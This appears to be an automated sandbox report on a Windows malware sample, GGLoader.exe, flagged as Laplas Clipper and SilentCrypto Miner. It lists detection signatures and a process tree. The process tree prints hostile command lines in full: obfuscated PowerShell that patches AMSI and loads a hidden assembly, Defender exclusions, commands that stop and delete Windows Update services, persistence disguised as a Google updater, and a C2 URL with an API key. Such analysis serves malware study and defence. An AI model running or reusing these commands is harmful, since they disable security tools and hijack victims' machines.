
Windows Analysis Report
GGLoader.exe

Overview

General Information

Sample name:GGLoader.exe
Analysis ID:1526110
MD5:982e4ae4559538cfb529dfaff0507880
SHA1:a3b0e3989d6e40792134286e40448004ebeda077
SHA256:95a08f9fd8741d2b265a43143289af012ca24cee776609bc79337d63988246fd

Detection

Laplas Clipper, SilentCrypto Miner
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Stop multiple services
Suricata IDS alerts for network traffic
Yara detected Laplas Clipper
Yara detected Powershell download and execute
Yara detected SilentCrypto Miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Binary or sample is protected by dotNetProtector
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Drops large PE files
Encrypted powershell cmdline option found
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Found stalling execution ending in API Sleep call
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Modifies the hosts file
Modifies the prolog of user mode functions (user mode inline hooks)
Obfuscated command line found
Potential dropper URLs found in powershell memory
Powershell drops PE file
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Net WebClient Casing Anomalies
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential WinAPI Calls Via CommandLine
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Stops critical windows services
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses cmd line tools excessively to alter registry or file data
Uses powercfg.exe to modify the power settings
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
PE file overlay found
Queries disk information (often used to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Uncommon Svchost Parent Process
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

  • System is w10x64
  • GGLoader.exe (PID: 7460 cmdline: "C:\Users\user\Desktop\GGLoader.exe" MD5: 982E4AE4559538CFB529DFAFF0507880)
    • powershell.exe (PID: 7520 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7684 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#nus#>[System.Windows.Forms.MessageBox]::Show('No Virtual Machine/Server is allowed! Try running on a different device!','','OK','Error')<#wkk#>; MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • LicCheck.exe (PID: 7932 cmdline: "C:\Users\user\AppData\Local\Temp\LicCheck.exe" MD5: 726A5B76F4C40551741FFDDA14088CE3)
        • schtasks.exe (PID: 7768 cmdline: "C:\Windows\System32\schtasks.exe" /create /tn "svcupdater" /tr "C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)
          • conhost.exe (PID: 7804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • LicSend.exe (PID: 7948 cmdline: "C:\Users\user\AppData\Local\Temp\LicSend.exe" MD5: 4648D5EF582C7B17D9712F5B5B60F046)
        • dialer.exe (PID: 916 cmdline: C:\Windows\System32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
  • powershell.exe (PID: 8052 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 8064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5460 cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 3332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 4464 cmdline: sc stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 7532 cmdline: sc stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 7496 cmdline: sc stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 7700 cmdline: sc stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 5432 cmdline: sc stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • reg.exe (PID: 7224 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
    • reg.exe (PID: 4884 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
    • reg.exe (PID: 2032 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
    • reg.exe (PID: 2000 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
    • reg.exe (PID: 4564 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • cmd.exe (PID: 5672 cmdline: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 5052 cmdline: powercfg /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 7504 cmdline: powercfg /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 7468 cmdline: powercfg /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 7460 cmdline: powercfg /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
  • powershell.exe (PID: 3760 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ncotqmia#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' } MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svcupdater.exe (PID: 7904 cmdline: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe MD5: 60EF19D1B9B74D6AAD6007EBBF88CDF3)
  • powershell.exe (PID: 8068 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:NGLbonfBsuNR{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$QtvYIpWnFCFICq,[Parameter(Position=1)][Type]$hhlNOVEDYw)$dpttUeHYiSd=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+''+'d'+''+[Char](68)+'e'+[Char](108)+''+'e'+''+[Char](103)+'a'+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+'em'+[Char](111)+''+[Char](114)+''+[Char](121)+'M'+'o'+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType(''+[Char](77)+'yD'+'e'+'l'+[Char](101)+''+'g'+'at'+'e'+''+'T'+''+[Char](121)+''+'p'+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+'P'+[Char](117)+''+'b'+''+[Char](108)+'ic'+[Char](44)+''+[Char](83)+''+[Char](101)+'ale'+[Char](100)+''+[Char](44)+''+[Char](65)+''+'n'+''+[Char](115)+'i'+'C'+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+'A'+''+[Char](117)+''+[Char](116)+'o'+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$dpttUeHYiSd.DefineConstructor(''+[Char](82)+''+'T'+''+'S'+''+[Char](112)+''+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+''+'m'+'e,'+[Char](72)+'ide'+'B'+'y'+'S'+''+'i'+''+[Char](103)+''+','+'P'+[Char](117)+''+'b'+'l'+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$QtvYIpWnFCFICq).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nt'+[Char](105)+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+'n'+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');$dpttUeHYiSd.DefineMethod('I'+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+'e'+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+'i'+''+'c'+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Cha
r](66)+'y'+'S'+''+[Char](105)+'g'+[Char](44)+'N'+'e'+'w'+[Char](83)+''+[Char](108)+''+[Char](111)+''+'t'+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+'u'+''+[Char](97)+''+'l'+'',$hhlNOVEDYw,$QtvYIpWnFCFICq).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+'a'+''+'n'+''+'a'+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $dpttUeHYiSd.CreateType();}$fxvCjurJEEUcT=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+'t'+''+[Char](101)+'m'+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType('M'+'i'+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+'s'+'o'+'f'+'t'+'.'+''+'W'+''+[Char](105)+''+'n'+''+[Char](51)+''+'2'+''+[Char](46)+''+'U'+'n'+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+'f'+'x'+''+[Char](118)+'C'+[Char](106)+''+'u'+''+[Char](114)+''+[Char](74)+''+[Char](69)+''+[Char](69)+''+[Char](85)+''+[Char](99)+''+'T'+'');$WfnyPndttaFlQY=$fxvCjurJEEUcT.GetMethod(''+[Char](87)+''+[Char](102)+'n'+'y'+''+'P'+''+'n'+''+'d'+''+'t'+''+'t'+''+[Char](97)+''+[Char](70)+'l'+[Char](81)+'Y',[Reflection.BindingFlags]''+[Char](80)+'u'+'b'+'l'+'i'+''+[Char](99)+''+','+''+[Char](83)+'ta'+'t'+''+[Char](105)+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$JjiXXwpbbbrjfbPnDMc=NGLbonfBsuNR @([String])([IntPtr]);$BLVFENqGmioLfqvbpVmToD=NGLbonfBsuNR 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$LGtHULICQkP=$fxvCjurJEEUcT.GetMethod(''+[Char](71)+''+'e'+''+'t'+''+'M'+''+[Char](111)+''+[Char](100)+'u'+[Char](108)+''+[Char](101)+''+'H'+'a'+[Char](110)+''+[Char](100)+''+[Char](108)+'e').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+'r'+''+'n'+'e'+[Char](108)+''+'3'+''+[Char](50)+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'')));$MCfPqlHPuVRchK=$WfnyPndttaFlQY.Invoke($Null,@([Object]$LGtHULICQkP,[Object]('L'+[Char](111)+''+[Char](97)+'d'+'L'+'i'+[Char](98)+''+[Char](114)+''+'a'+'r'+[Char](121)+''+[Char](65)+'')));$OyytwRheaSYqFgycC=$WfnyPndttaFlQY.Invoke($Null,@([Object]$LGtHULICQkP,[Object]('Vir'+[Char](116)+''+[Char](117)+'a'+[Char](108)+''+[Char](80)+''+[Char](114)+'o'+'t'+''+[Char](101)+''+[Char](99)+''+'t'+'')));$TWYbqKR=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MCfPqlHPuVRchK,$JjiXXwpbbbrjfbPnDMc).Invoke(''+[Char](97)+'m'+'s'+'i'+'.'+''+[Char](100)+''+[Char](108)+'l');$yVOcIkghuDjvLnFeb=$WfnyPndttaFlQY.Invoke($Null,@([Object]$TWYbqKR,[Object](''+'A'+'m'+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+'u'+'f'+[Char](102)+'er')));$uCYiRUffMm=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OyytwRheaSYqFgycC,$BLVFENqGmioLfqvbpVmToD).Invoke($yVOcIkghuDjvLnFeb,[uint32]8,4,[ref]$uCYiRUffMm);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$yVOcIkghuDjvLnFeb,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OyytwRheaSYqFgycC,$BLVFENqGmioLfqvbpVmToD).Invoke($yVOcIkghuDjvLnFeb,[uint32]8,0x20,[ref]$uCYiRUffMm);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+'T'+'W'+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+[Char](100)+'i'+'a'+''+'l'+''+'e'+'rsta'+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 3412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 8000 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:QgCYtqphZUyk{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$MPiGGXNLyYxMMn,[Parameter(Position=1)][Type]$YKFTYMbQTB)$nMulMONdbgM=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+'l'+'e'+'c'+''+'t'+'e'+[Char](100)+'D'+[Char](101)+''+[Char](108)+'e'+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+''+[Char](101)+''+'m'+'or'+[Char](121)+''+[Char](77)+''+[Char](111)+''+'d'+'u'+[Char](108)+''+'e'+'',$False).DefineType(''+[Char](77)+''+'y'+''+[Char](68)+''+[Char](101)+'le'+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+''+[Char](84)+''+'y'+'p'+[Char](101)+'',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+'li'+'c'+''+','+'S'+[Char](101)+''+'a'+''+[Char](108)+'ed,A'+[Char](110)+'s'+[Char](105)+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+'s'+[Char](44)+''+[Char](65)+''+'u'+''+[Char](116)+''+[Char](111)+''+[Char](67)+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$nMulMONdbgM.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+'p'+''+[Char](101)+''+'c'+''+[Char](105)+''+'a'+''+'l'+''+[Char](78)+''+[Char](97)+'me'+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+'Si'+[Char](103)+''+','+''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$MPiGGXNLyYxMMn).SetImplementationFlags(''+'R'+'u'+[Char](110)+'t'+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+'n'+[Char](97)+''+'g'+''+'e'+''+[Char](100)+'');$nMulMONdbgM.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+'k'+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+'b'+[Char](108)+'i'+[Char](99)+','+[Char](72)+''+'i
'+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+'ig'+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+'S'+[Char](108)+'ot'+[Char](44)+'V'+[Char](105)+'r'+'t'+'u'+[Char](97)+''+[Char](108)+'',$YKFTYMbQTB,$MPiGGXNLyYxMMn).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+'M'+'a'+''+[Char](110)+''+'a'+''+'g'+''+[Char](101)+'d');Write-Output $nMulMONdbgM.CreateType();}$mrsNZvUsWJBnM=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+'.d'+[Char](108)+'l')}).GetType('Mi'+[Char](99)+''+'r'+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+''+[Char](116)+''+'.'+''+'W'+''+'i'+''+'n'+'3'+[Char](50)+'.'+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+'emr'+[Char](115)+''+[Char](78)+''+[Char](90)+''+'v'+''+[Char](85)+'s'+[Char](87)+''+[Char](74)+'B'+[Char](110)+''+[Char](77)+'');$xKuInBktgkPNhs=$mrsNZvUsWJBnM.GetMethod(''+'x'+'Ku'+[Char](73)+''+'n'+''+[Char](66)+''+[Char](107)+''+[Char](116)+''+'g'+'k'+[Char](80)+''+'N'+'h'+'s'+'',[Reflection.BindingFlags]'Pub'+'l'+''+'i'+''+'c'+''+','+''+[Char](83)+''+'t'+''+'a'+''+[Char](116)+''+[Char](105)+'c',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$hpDOMeMRBRCuAUuldah=QgCYtqphZUyk @([String])([IntPtr]);$lBJaJRBvBxDAIBOClAwhdJ=QgCYtqphZUyk 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$zPFNVuWfmpd=$mrsNZvUsWJBnM.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+'M'+''+[Char](111)+''+[Char](100)+''+'u'+''+[Char](108)+''+'e'+''+[Char](72)+''+[Char](97)+''+[Char](110)+''+'d'+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+'e'+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+'l'+'l')));$TxJrEjJObcCpmZ=$xKuInBktgkPNhs.Invoke($Null,@([Object]$zPFNVuWfmpd,[Object]('L'+[Char](111)+''+'a'+''+[Char](100)+'L'+[Char](105)+''+'b'+''+'r'+''+[Char](97)+''+[Char](114)+''+'y'+'A')));$bZvPuqWGWAxchxpvH=$xKuInBktgkPNhs.Invoke($Null,@([Object]$zPFNVuWfmpd,[Object](''+'V'+''+[Char](105)+'r'+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+'P'+''+'r'+'o'+[Char](116)+'e'+[Char](99)+'t')));$jweDifO=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($TxJrEjJObcCpmZ,$hpDOMeMRBRCuAUuldah).Invoke(''+[Char](97)+''+'m'+''+[Char](115)+''+'i'+''+[Char](46)+'d'+'l'+''+[Char](108)+'');$fOCXrgjBAURvBdTAm=$xKuInBktgkPNhs.Invoke($Null,@([Object]$jweDifO,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+'a'+''+[Char](110)+''+'B'+'uf'+[Char](102)+'e'+'r'+'')));$tTEVvGnGYm=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bZvPuqWGWAxchxpvH,$lBJaJRBvBxDAIBOClAwhdJ).Invoke($fOCXrgjBAURvBdTAm,[uint32]8,4,[ref]$tTEVvGnGYm);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$fOCXrgjBAURvBdTAm,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bZvPuqWGWAxchxpvH,$lBJaJRBvBxDAIBOClAwhdJ).Invoke($fOCXrgjBAURvBdTAm,[uint32]8,0x20,[ref]$tTEVvGnGYm);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+'TW'+[Char](65)+'R'+'E'+'').GetValue(''+[Char](100)+''+[Char](105)+'a'+[Char](108)+''+'e'+''+'r'+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+'g'+
'e'+'r'+'')).EntryPoint.Invoke($Null,$Null) MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dllhost.exe (PID: 8168 cmdline: C:\Windows\System32\dllhost.exe /Processid:{096b6fe7-1e57-4538-901c-c68ea60d3345} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
      • winlogon.exe (PID: 552 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
      • lsass.exe (PID: 628 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
      • svchost.exe (PID: 920 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • dwm.exe (PID: 988 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
      • svchost.exe (PID: 364 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 356 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 696 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 592 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1044 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1084 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1200 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1252 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1296 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1316 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1408 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
{"C2 url": "http://45.159.189.105/bot/", "API key": "5ef1aac7b3430729f6cbc95fb4d2d2a62582e7382955ffc87026077cb28ab31e"}
Yara matches

Memory dumps
Source | Rule | Description | Author
00000028.00000002.2555004791.000001C52EB9A000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SilentCryptoMiner | Yara detected SilentCrypto Miner | Joe Security
